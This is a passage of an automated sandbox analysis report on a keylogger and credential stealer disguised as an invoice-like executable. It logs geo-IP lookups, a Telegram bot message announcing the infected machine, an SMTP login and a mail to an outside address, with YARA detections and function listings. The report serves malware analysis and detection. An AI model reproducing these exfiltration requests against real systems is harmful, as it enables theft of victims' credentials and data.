2024-11-20 09:12:13 UTC	848	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:13 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 57842 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wWc06F8lxU7KaPHe7ysL9qK2BhyyokRKzwfwGA4KiptcSwQuOaBoYh8CB%2F48L1LGaLxbInJIs8rxlguD2iQgT3ZBlFIfSCEhQ3QqvmiJPMIDcdbvDNGWC1Fnb%2BHFvKLA4QUEHKtF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5751299e0843c2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2373&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1230509&cwnd=134&unsent_bytes=0&cid=12956871ea77bf7e&ts=138&x=0"
2024-11-20 09:12:13 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49740	188.114.97.3	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:12:14 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-20 09:12:14 UTC	858	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:14 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 57843 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UmYeokMywySIBSiY1DIb%2F858V4XMNzVeZocvv9Fxus9IwleyXaT0GD7uRMq7Nv9386qD2zs87pRzeb0%2FLtsMJeSpHefOli3EkDzmhHCdKZeQxAtspwX%2Fl%2FetWhQ%2B7Z72%2Bd5Tz%2BTs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5751342e6a0c92-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1473&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1929940&cwnd=176&unsent_bytes=0&cid=7d29382c0e1b176d&ts=134&x=0"
2024-11-20 09:12:14 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	188.114.97.3	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:12:15 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 09:12:16 UTC	852	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:16 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 57845 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bygca6qYiZqj8BmWsECIzzLzu2rb09DtJvMrTInlZh%2BzGlG6fRIZIGVcmnnjO%2FZXf95WqRoqKPQaxhf46WRHPgPPvBcigXH89frKR1uhQXwKk59D0obbIuBphJWzD%2FFkkGqTOUap"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e57513c6c900f87-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1691&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1680092&cwnd=250&unsent_bytes=0&cid=bac6d5ff8ec7bce3&ts=161&x=0"
2024-11-20 09:12:16 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	188.114.97.3	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:12:17 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 09:12:17 UTC	856	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:17 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 57846 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SBsYkM4GCp%2BRt%2FOLRce6n3j1rqZp%2FPyivnsloWxaKYrowx2KdGkxtA%2B2Pf5pMazqSTba4sqyyrHXM%2FGVF2YxQpajXeCcHpgWD1T1Gq2VeW%2Fu0p4xXlWVaKBdmw0J3o6kqbgxtyYm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e575144ef7141a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1641&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1834170&cwnd=238&unsent_bytes=0&cid=3a95dcbd82248308&ts=172&x=0"
2024-11-20 09:12:17 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49751	188.114.97.3	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:12:18 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 09:12:19 UTC	851	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 09:12:19 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 57847 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j0NgDvBaIBmDJGvdJxYyVU1ME7Jmne21LivWM4yOfji6GMf2GUxgJMv04jKniHMd06%2BAFDoGNRlT9zDDkVQi8az0os%2BjDNQF682%2FhjuulAeG4W6jh8%2Fdt1xBvWaDpOC10T9tuvFi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e57514ebb0541c3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1755862&cwnd=75&unsent_bytes=0&cid=4d01e4cd9adeda7c&ts=154&x=0"
2024-11-20 09:12:19 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	149.154.167.220	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 09:12:19 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2020/11/2024%20/%2021:02:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-20 09:12:20 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 20 Nov 2024 09:12:19 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-20 09:12:20 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 20, 2024 10:12:26.622209072 CET	587	49754	188.128.134.93	192.168.2.4	220 cloudserver112361.home.pl ESMTP Mailsystemx
Nov 20, 2024 10:12:26.622452974 CET	49754	587	192.168.2.4	188.128.134.93	EHLO 899552
Nov 20, 2024 10:12:26.831485033 CET	587	49754	188.128.134.93	192.168.2.4	250-cloudserver112361.home.pl 250-PIPELINING 250-SIZE 157286400 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Nov 20, 2024 10:12:26.832825899 CET	49754	587	192.168.2.4	188.128.134.93	AUTH login cGFudGFAcGFudGEuZ2RhLnBs
Nov 20, 2024 10:12:27.043236017 CET	587	49754	188.128.134.93	192.168.2.4	334 UGFzc3dvcmQ6
Nov 20, 2024 10:12:27.257616043 CET	587	49754	188.128.134.93	192.168.2.4	235 2.7.0 Authentication successful
Nov 20, 2024 10:12:27.258130074 CET	49754	587	192.168.2.4	188.128.134.93	MAIL FROM:<panta@panta.gda.pl>
Nov 20, 2024 10:12:27.470093966 CET	587	49754	188.128.134.93	192.168.2.4	250 2.1.0 Ok
Nov 20, 2024 10:12:27.470418930 CET	49754	587	192.168.2.4	188.128.134.93	RCPT TO:<og.bahd@yandex.ru>
Nov 20, 2024 10:12:27.683676958 CET	587	49754	188.128.134.93	192.168.2.4	250 2.1.5 Ok
Nov 20, 2024 10:12:27.683871031 CET	49754	587	192.168.2.4	188.128.134.93	DATA
Nov 20, 2024 10:12:27.894241095 CET	587	49754	188.128.134.93	192.168.2.4	354 End data with <CR><LF>.<CR><LF>
Nov 20, 2024 10:12:27.895116091 CET	49754	587	192.168.2.4	188.128.134.93	.
Nov 20, 2024 10:12:28.347641945 CET	587	49754	188.128.134.93	192.168.2.4	250 2.0.0 Ok: queued as 8FADA52058F
Nov 20, 2024 10:14:05.619169950 CET	49754	587	192.168.2.4	188.128.134.93	QUIT
Nov 20, 2024 10:14:05.826808929 CET	587	49754	188.128.134.93	192.168.2.4	221 2.0.0 Bye

Target ID:	0
Start time:	04:11:57
Start date:	20/11/2024
Path:	C:\Users\user\Desktop\114117914 - Rebound Electronics.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\114117914 - Rebound Electronics.exe"
Imagebase:	0xc20000
File size:	1'069'056 bytes
MD5 hash:	F336089ABF758F7BB565EBD1366E2AD2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:11:58
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\114117914 - Rebound Electronics.exe"
Imagebase:	0xd50000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4130425845.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4130425845.000000000303D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	7%
Total number of Nodes:	2000
Total number of Limit Nodes:	63

Executed Functions

Function 00C4B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ced2e3ff8045bf885a71fc77ffb23fcbb038a478bbafbc1e8e818752a7ebc77
Instruction ID: c617b66f168106064a22f70bec969c3988b3dc40be5f36ce09309537e0962dc6
Opcode Fuzzy Hash: 3ced2e3ff8045bf885a71fc77ffb23fcbb038a478bbafbc1e8e818752a7ebc77
Instruction Fuzzy Hash: C5326A75B022688BCB24CF55DC81BE9B7B5FF4A314F1841D9E41AA7A91D7309E80CF52

Function 00C23D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00C23AA3,?), ref: 00C23D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00C23AA3,?), ref: 00C23D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,00CE1148,00CE1130,?,?,?,?,00C23AA3,?), ref: 00C23DC8

Part of subcall function 00C26430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C23DEE,00CE1148,?,?,?,?,?,00C23AA3,?), ref: 00C26471

SetCurrentDirectoryW.KERNEL32(?,?,?,00C23AA3,?), ref: 00C23E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00CD28F4,00000010), ref: 00C91CCE
SetCurrentDirectoryW.KERNEL32(?,00CE1148,?,?,?,?,?,00C23AA3,?), ref: 00C91D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CBDAB4,00CE1148,?,?,?,?,?,00C23AA3,?), ref: 00C91D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00C23AA3), ref: 00C91D90

Part of subcall function 00C23E6E: GetSysColorBrush.USER32(0000000F), ref: 00C23E79
Part of subcall function 00C23E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00C23E88
Part of subcall function 00C23E6E: LoadIconW.USER32(00000063), ref: 00C23E9E
Part of subcall function 00C23E6E: LoadIconW.USER32(000000A4), ref: 00C23EB0
Part of subcall function 00C23E6E: LoadIconW.USER32(000000A2), ref: 00C23EC2
Part of subcall function 00C23E6E: RegisterClassExW.USER32(?), ref: 00C23F30

Part of subcall function 00C236B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C236E6
Part of subcall function 00C236B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C23707
Part of subcall function 00C236B8: ShowWindow.USER32(00000000,?,?,?,?,00C23AA3,?), ref: 00C2371B
Part of subcall function 00C236B8: ShowWindow.USER32(00000000,?,?,?,?,00C23AA3,?), ref: 00C23724

Part of subcall function 00C24FFC: _memset.LIBCMT ref: 00C25022
Part of subcall function 00C24FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C250CB

Strings

This is a third-party compiled AutoIt script., xrefs: 00C91CC8
runas, xrefs: 00C91D84

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-3287110873
Opcode ID: 17cc418a874cc07568128270283ec40241fb9e2f8f92919ea577ac1b46396b09
Instruction ID: bcfde91c51ff59af2c1c4730e21838b5eb970c544e402f2366b0490a7ffea6c6
Opcode Fuzzy Hash: 17cc418a874cc07568128270283ec40241fb9e2f8f92919ea577ac1b46396b09
Instruction Fuzzy Hash: E8516B30E042D5AACF01ABB1FC86FEE7B799F15700F044029FA13675A2CA744B59E721

Function 00C3DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00C3DDEC
GetCurrentProcess.KERNEL32(00000000,00CBDC38,?,?), ref: 00C3DEAC
GetNativeSystemInfo.KERNELBASE(?,00CBDC38,?,?), ref: 00C3DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 00C3DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 00C3DF1F
GetSystemInfo.KERNEL32(?,00CBDC38,?,?), ref: 00C3DF29
GetSystemInfo.KERNEL32(?,00CBDC38,?,?), ref: 00C3DF35

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: ee2efa66ff68f7219b22c5acf141e2075f5f32aa3bd969532ff2f88c99d9b174
Instruction ID: 7ad839303bc5cdf093460d96540fb2f0749e1b5a6f975ba7800835891cf3cd80
Opcode Fuzzy Hash: ee2efa66ff68f7219b22c5acf141e2075f5f32aa3bd969532ff2f88c99d9b174
Instruction Fuzzy Hash: 6661A1B181A384DBCF15CF68A8C55ED7FB4AF29300F1989D9D8869F207C634CA49CB65

Function 00C2406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C2449E,?,?,00000000,00000001), ref: 00C2407B
